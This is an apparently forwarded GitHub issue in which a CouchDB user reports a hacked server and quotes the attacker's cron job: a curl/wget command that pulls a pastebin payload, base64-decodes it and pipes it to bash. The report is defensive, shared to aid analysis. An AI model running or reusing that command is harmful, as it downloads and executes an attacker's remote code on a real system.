[GitHub] eimajenthat opened a new issue #1743: Found cron job after CouchDB server hacked

[GitBox <gi...@apache.org>]

eimajenthat opened a new issue #1743: Found cron job after CouchDB server hacked
URL: https://github.com/apache/couchdb/issues/1743
 
 
   This is not a bug report per se.  I'm just trying to do my civic duty.  I had a server hacked via CouchDB.  It's a cheap VPS I use for various prototypes and experiments, nothing mission critical.  However, it has a public IP.  The fault is mine.  I didn't read the docs carefully enough and secure it properly.  Anyway, as I'm going through, cleaning it up, I found a cron job the attacker created for the couchdb user.  I didn't trace the whole thing, it's a bit convoluted.  But it looks like it pulls a pastebin, which pulls another pastebin, which pulls another, in a whole chain.  Also grabs some stuff from GitHub.
   
   The cron job looks like: `(curl -fsSL https://pastebin.com/raw/UxW3xJrs || wget -q -O- https://pastebin.com/raw/UxW3xJrs) | base64 -d | /bin/bash`
   
   I thought someone might be interested in tearing this apart, in case it reveals some new vulnerabilities in CouchDB or something.  Or maybe there are some signatures in there that could be used to prevent future attacks?  I don't know.  I just thought if my suffering can be beneficial to someone else, I'd like it to be.
   
   I'm in the process of removing all this vandal's handiwork from my server, and hopefully almost done.  So examining my server probably wouldn't be very helpful at this point.  I wish I'd kept more of it for forensic purposes, but I was focused on eliminating the threat at the moment.  Sorry about that.

----------------------------------------------------------------
This is an automated message from the Apache Git Service.
To respond to the message, please log on GitHub and use the
URL above to go to the specific comment.
 
For queries about this service, please contact Infrastructure at:
users@infra.apache.org


With regards,
Apache Git Services